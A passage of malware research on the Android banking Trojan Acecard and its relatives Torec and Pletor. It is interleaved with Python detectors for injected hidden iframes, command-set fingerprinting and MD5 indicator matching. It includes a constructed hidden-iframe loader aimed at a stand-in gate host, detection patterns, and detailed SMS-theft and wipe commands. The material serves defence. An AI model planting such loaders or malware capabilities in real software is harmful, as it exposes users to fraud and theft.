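Added example, not code from the ISC diary or The Register. The "deployed"
script and the injected tail are constructed stand-ins, not the campaign's
real payload; the gate URL is hypothetical.
"""
import hashlib
import os
import re

# Strings the ISC reported in the campaign's gate URLs.
GATE_TOKENS = ("admedia", "megaadvertize")

# Code that creates an iframe and, within a short distance, hides it.
HIDDEN_IFRAME = re.compile(
    r"(document\.write|createElement\s*\(\s*['\"]iframe['\"]\s*\)|<iframe)"
    r"[\s\S]{0,400}?"
    r"(width\s*[:=]\s*['\"]?\s*[01]\b|height\s*[:=]\s*['\"]?\s*[01]\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)",
    re.IGNORECASE,
)


def make_baseline(files):
    """Record (length, sha256) for each deployed file, keyed by path."""
    return {name: (len(data), hashlib.sha256(data).hexdigest())
            for name, data in files.items()}


def compare_to_baseline(content, base_len, base_sha256):
    """Return (status, appended_bytes). A pure append leaves the original
    prefix intact, so hashing just that prefix tells an append apart from
    an in-place edit."""
    if len(content) < base_len:
        return "truncated", b""
    if hashlib.sha256(content[:base_len]).hexdigest() != base_sha256:
        return "modified", b""
    if len(content) == base_len:
        return "clean", b""
    return "appended", content[base_len:]


def find_indicators(text):
    """Heuristic scan: gate keywords and hidden-iframe construction."""
    findings = []
    lower = text.lower()
    for token in GATE_TOKENS:
        for m in re.finditer(re.escape(token), lower):
            findings.append(("gate-token", token, m.start()))
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append(("hidden-iframe", m.group(0)[:80], m.start()))
    return findings


def scan_file(name, content, baseline):
    """Combine the baseline diff with the content heuristics."""
    status, tail = "no-baseline", b""
    if name in baseline:
        status, tail = compare_to_baseline(content, *baseline[name])
    findings = find_indicators(content.decode("utf-8", "replace"))
    return {
        "file": name,
        "status": status,
        "appended_bytes": len(tail),
        "findings": findings,
        "suspicious": status in ("appended", "modified") or bool(findings),
    }


def scan_tree(root, baseline):
    """Walk a web root and scan every .js file against the baseline."""
    reports = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(".js"):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    reports.append(scan_file(os.path.relpath(path, root), fh.read(), baseline))
    return reports


# Constructed samples: a stand-in site script and the same file with an
# appended hidden-iframe loader pointing at a hypothetical gate URL.
CLEAN_JS = ("/* constructed stand-in for a site's own script */\n"
            "(function(){var n=1;window.site={ok:function(){return n;}};})();\n")
INJECTED_JS = CLEAN_JS + (
    "var _f=document.createElement('iframe');"
    "_f.src='http://gate.example/megaadvertize/?x=1';"
    "_f.width=1;_f.height=1;_f.style.display='none';"
    "document.body.appendChild(_f);\n"
)
DEPLOYED = {"js/site.js": CLEAN_JS.encode()}
BASELINE = make_baseline(DEPLOYED)

if __name__ == "__main__":
    for content in (CLEAN_JS, INJECTED_JS):
        print(scan_file("js/site.js", content.encode(), BASELINE))
```

The baseline comparison is the part that holds up when the attackers change their keywords: an append to a file you deployed is suspicious whatever it contains, so run make_baseline at deploy time and scan_tree on a schedule, and treat the keyword and iframe heuristics as triage hints for the appended tail rather than as the detection itself.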

The Evolution of Acecard

While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard.

This family accounted for almost all the banker Trojan attacks in Australia. After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications.
In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords.

Two other apps are targeted by the Trojan for their credit card details.

But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages. Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices.

All three Trojans run on Android.

How it all started

Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family. It all started with Backdoor.AndroidOS.Torec.a.

The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:
- #intercept_sms_start – start intercepting incoming SMSs;
- #intercept_sms_stop – stop intercepting incoming SMSs;
- #ussd – create a USSD request;
- #listen_sms_start – start stealing incoming SMSs;
- #listen_sms_stop – stop stealing incoming SMSs;
- #check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
- #grab_apps – send a list of applications installed on the mobile device to the C&C;
- #send_sms – send an SMS to numbers specified in the command;
- #control_number – change the phone’s control number.

Then, in April 2014, a new version emerged with more capabilities.

The additional commands were:
- #check_gps – send the device’s coordinates to the C&C;
- #block_numbers – add numbers to the SMS interception list;
- #unblock_all_numbers – clear the SMS interception list;
- #unblock_numbers – remove specified numbers from the SMS interception list;
- #sentid – send an SMS with the Trojan’s ID to a specified number.

In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a.
It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C. A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields. We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware.

From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family. An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples:

[Figure: code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a]
[Figure: code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a]
[Figure: code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a]

Here is another example:

[Figure: code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a]
[Figure: code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a]
[Figure: code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a]

A lot of the class, method and variable names are the same for all three Trojans.

The code of the corresponding methods is either the same or very similar with only minor differences.

Acecard’s progress

The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:
- #intercept_sms_start – start intercepting incoming SMSs;
- #intercept_sms_stop – stop intercepting incoming SMSs;
- #send_sms – send an SMS to the number specified in the command;
- #control_number – change the phone’s control number.

The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor.

Besides that, we identified two more differences.

Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:
- #intercept_sms_start – start intercepting incoming SMSs;
- #intercept_sms_stop – stop intercepting incoming SMSs;
- #ussd – create a USSD request;
- #check_gps – send the device’s coordinates to the C&C;
- #block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
- #unblock_all_numbers – clear the SMS interception list;
- #unblock_numbers – remove specified numbers from the SMS interception list;
- #listen_sms_start – start stealing incoming SMSs;
- #listen_sms_stop – stop stealing incoming SMSs;
- #check – send the Trojan’s ID to the C&C;
- #grab_apps – send the list of applications installed on the mobile device to the C&C;
- #send_sms – send an SMS to the number specified in the command;
- #control_number – change the phone’s control number;
- #sentid – send an SMS with the Trojan’s ID to a specified number;
- #show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.

The second difference was the number of phishing windows.
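The command lists above are a usable static fingerprint: the #-prefixed command strings survive in a sample's string dump, and comparing the set a sample contains with the sets known for each generation of Torec and Acecard gives a quick variant attribution and a capability summary. The Python below is an added example, not Kaspersky Lab's code. The command sets are the ones listed in this article; the August 2015 set is assumed to be the August 2014 set plus #wipe, the one command the article says was added then. The strings dump is constructed and the C&C URL in it is hypothetical.

```python
"""Attribute a sample to a Torec/Acecard generation by its C&C command set.

Added example, not Kaspersky Lab code. The command sets are the ones listed
in the article above; the August 2015 set is assumed to be the August 2014
set plus #wipe. The strings dump is constructed and the C&C URL is
hypothetical.
"""
import re
from collections import OrderedDict

TOREC_FEB_2014 = {
    "intercept_sms_start", "intercept_sms_stop", "ussd", "listen_sms_start",
    "listen_sms_stop", "check", "grab_apps", "send_sms", "control_number",
}
TOREC_APR_2014 = TOREC_FEB_2014 | {
    "check_gps", "block_numbers", "unblock_all_numbers", "unblock_numbers", "sentid",
}
ACECARD_A_JUN_2014 = {"intercept_sms_start", "intercept_sms_stop", "send_sms", "control_number"}
ACECARD_AUG_2014 = TOREC_APR_2014 | {"show_dialog"}
ACECARD_AUG_2015 = ACECARD_AUG_2014 | {"wipe"}   # assumption: Aug 2014 set plus #wipe

PROFILES = OrderedDict([
    ("Torec.a, Feb 2014", TOREC_FEB_2014),
    ("Torec, Apr 2014", TOREC_APR_2014),
    ("Acecard.a, Jun 2014", ACECARD_A_JUN_2014),
    ("Acecard, Aug 2014", ACECARD_AUG_2014),
    ("Acecard, Aug 2015", ACECARD_AUG_2015),
])
KNOWN = set().union(*PROFILES.values())

# A command token as it appears in the binary: '#' followed by a lowercase name.
COMMAND = re.compile(r"#([a-z][a-z_]{2,})\b")


def extract_commands(strings_dump):
    """Set of command names found in a `strings`-style dump."""
    return set(COMMAND.findall(strings_dump))


def jaccard(a, b):
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def capabilities(cmds):
    """Translate commands into the behaviours an analyst cares about."""
    caps = []
    if cmds & {"intercept_sms_start", "listen_sms_start", "block_numbers"}:
        caps.append("sms_interception")
    if cmds & {"send_sms", "ussd"}:
        caps.append("outbound_sms_or_ussd")
    if "show_dialog" in cmds:
        caps.append("phishing_overlay")
    if "check_gps" in cmds:
        caps.append("geolocation")
    if "wipe" in cmds:
        caps.append("device_wipe")
    return caps


def fingerprint(strings_dump):
    """Score the sample's command set against each known generation."""
    cmds = extract_commands(strings_dump)
    scores = {name: jaccard(cmds, known) for name, known in PROFILES.items()}
    best = max(scores, key=scores.get)   # ties resolve to the oldest profile
    return {
        "commands": sorted(cmds),
        "best_match": best,
        "score": round(scores[best], 3),
        "scores": {k: round(v, 3) for k, v in scores.items()},
        "unknown_commands": sorted(cmds - KNOWN),
        "capabilities": capabilities(cmds),
    }


# Constructed strings dump of the kind `strings classes.dex` would give.
SAMPLE_STRINGS = """\
Lcom/example/SmsProcessor;
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.SYSTEM_ALERT_WINDOW
#intercept_sms_start
#intercept_sms_stop
#ussd
#check_gps
#block_numbers
#unblock_all_numbers
#unblock_numbers
#listen_sms_start
#listen_sms_stop
#check
#grab_apps
#send_sms
#control_number
#sentid
#show_dialog
#wipe
http://c2.example.invalid/gate.php
"""

if __name__ == "__main__":
    import json
    print(json.dumps(fingerprint(SAMPLE_STRINGS), indent=2))
```

Commands that appear in no known set end up in unknown_commands, which is exactly the list worth reading when a new build turns up; the score against the closest known generation tells you how much of the sample is old code.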

Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows:
- IM services: WhatsApp, Viber, Instagram, Skype;
- the apps of the VKontakte, Odnoklassniki and Facebook social networks;
- the Gmail client;
- the official Twitter client.

In the second half of October 2014, we detected the next modification of Acecard.
It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users.

The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users.

This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries. At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US.

The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia. A new modification of Acecard emerged in mid-November 2014.

As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks. This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect. This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down.

This check is carried out in almost all subsequent modifications.
Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware. For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window. There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings. It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015.

Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.

[Figure: number of Acecard files detected each month]

The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans.

The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan. Also at this time, there was an increase in the number of attacks using this malicious program.

[Figure: number of unique users attacked by Acecard per month]

In the first half of September, we detected a new modification of Acecard.
Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks. This means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window. The subsequent development of Acecard’s “banking business” then got even faster: the next modification emerged just a few days later, and was capable of overlaying as many as 20 banking applications.

The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks. In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal.

The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS.

This version of Acecard intercepts SMSs from 17 Russian banks. Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks.
Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users.
In that month, the US came third in terms of the number of unique users attacked by this malware.

In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app. A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.

It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.

The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems.

Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger. Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.

[Figure: number of unique users attacked by country]

In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.

Propagation

In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software.

This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard. We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.

[Figure: a Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store]

The Trojan propagates under the guise of a game, but in reality it has no useful functionality.

The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard.
Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen. We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c.
It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges, Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor. The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans.

This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.

MD5

58FED8B5B549BE7ECBFBC6C63B84A728
8D260AB2BB36AEAF5B033B80B6BC1E6A
CF872ACDC583FE80B8F54957E14355DF
FBBCCD640CE75BD618A7F3187EC1B742
01E8CEA7DF22B1B3CC560ACB049F8EA0
DDCE6CE143CCA26E59063E7A4BB89019
9D34FC3CFCFFEA760FC1ADD377AA626A
03DA636518CCAF432AB68B269F7E6CC3
05EBAA5C7FFA440455ECB3519F923B56
E3FD483AD3731DD62FBE027B4E6880E6
53888352A4A1E3CB810B2A3F51D0BFC2
E1C794A614D5F6AAC38E2AEB77B139DA
54332ED8EA9AED12400A75496972D7D7
5DB57F89A85F647EBBC5BAFBC29C801E
702770D70C7AAB793FFD6A107FD08DAD
CF25782CAC01837ABACBF31130CA4E75
07DF64C87EA74F388EF86226BC39EADF
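The MD5 list above is the kind of indicator block that, when copied from a web page or scraped, often arrives as one unbroken hex run with no separators. The Python below is an added example, not Kaspersky Lab's code: it splits such a run into fixed-length digests, validates the run length, lower-cases and de-duplicates the result, and matches the indicators against a set of files. PAGE_RUN is the first three hashes printed above, concatenated; the "files" and the matching file content are constructed so the lookup can be demonstrated offline.

```python
"""Normalise a block of file hashes that arrived as one unbroken hex run and
match it against files.

Added example, not Kaspersky Lab code. PAGE_RUN is the first three MD5s from
the list above, concatenated as they commonly are when copied from a web
page; the file contents below are constructed.
"""
import hashlib
import re

HEX_RUN = re.compile(r"[0-9A-Fa-f]{32,}")
DIGEST_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64}


def split_concatenated(text, algo="md5"):
    """Split every long hex run in `text` into fixed-length digests,
    lower-cased and de-duplicated in order of first appearance. A run whose
    length is not a multiple of the digest size is rejected rather than
    guessed at, since a mis-split hash silently matches nothing."""
    width = DIGEST_LENGTHS[algo]
    out = []
    for run in HEX_RUN.findall(text):
        if len(run) % width:
            raise ValueError(f"hex run of length {len(run)} is not a whole number of {algo} digests")
        out.extend(run[i:i + width].lower() for i in range(0, len(run), width))
    return list(dict.fromkeys(out))


def index_files(files, algo="md5"):
    """Map digest -> file name for an in-memory {name: bytes} collection."""
    return {hashlib.new(algo, data).hexdigest(): name for name, data in files.items()}


def match_iocs(iocs, files, algo="md5"):
    """Return {digest: file name} for every indicator that hits a file."""
    index = index_files(files, algo)
    return {h: index[h] for h in iocs if h in index}


# First three MD5s from the article, concatenated as a scraper would leave them.
PAGE_RUN = "58FED8B5B549BE7ECBFBC6C63B84A7288D260AB2BB36AEAF5B033B80B6BC1E6ACF872ACDC583FE80B8F54957E14355DF"

# Constructed files; the suspect file's digest is appended to the run so
# the lookup has a hit without needing a real sample.
FILES = {
    "clean.apk": b"constructed clean content",
    "suspect.apk": b"constructed suspect content",
}
SUSPECT_MD5 = hashlib.md5(FILES["suspect.apk"]).hexdigest()
IOC_TEXT = "MD5 " + PAGE_RUN + SUSPECT_MD5.upper()

if __name__ == "__main__":
    iocs = split_concatenated(IOC_TEXT)
    print(len(iocs), "indicators")
    print(match_iocs(iocs, FILES))
```

For a mixed feed (MD5 and SHA-256 in the same block) the run length alone is ambiguous, since two MD5s are as long as one SHA-256; keep the sections separate and pass the algorithm explicitly, as the "MD5" heading above allows.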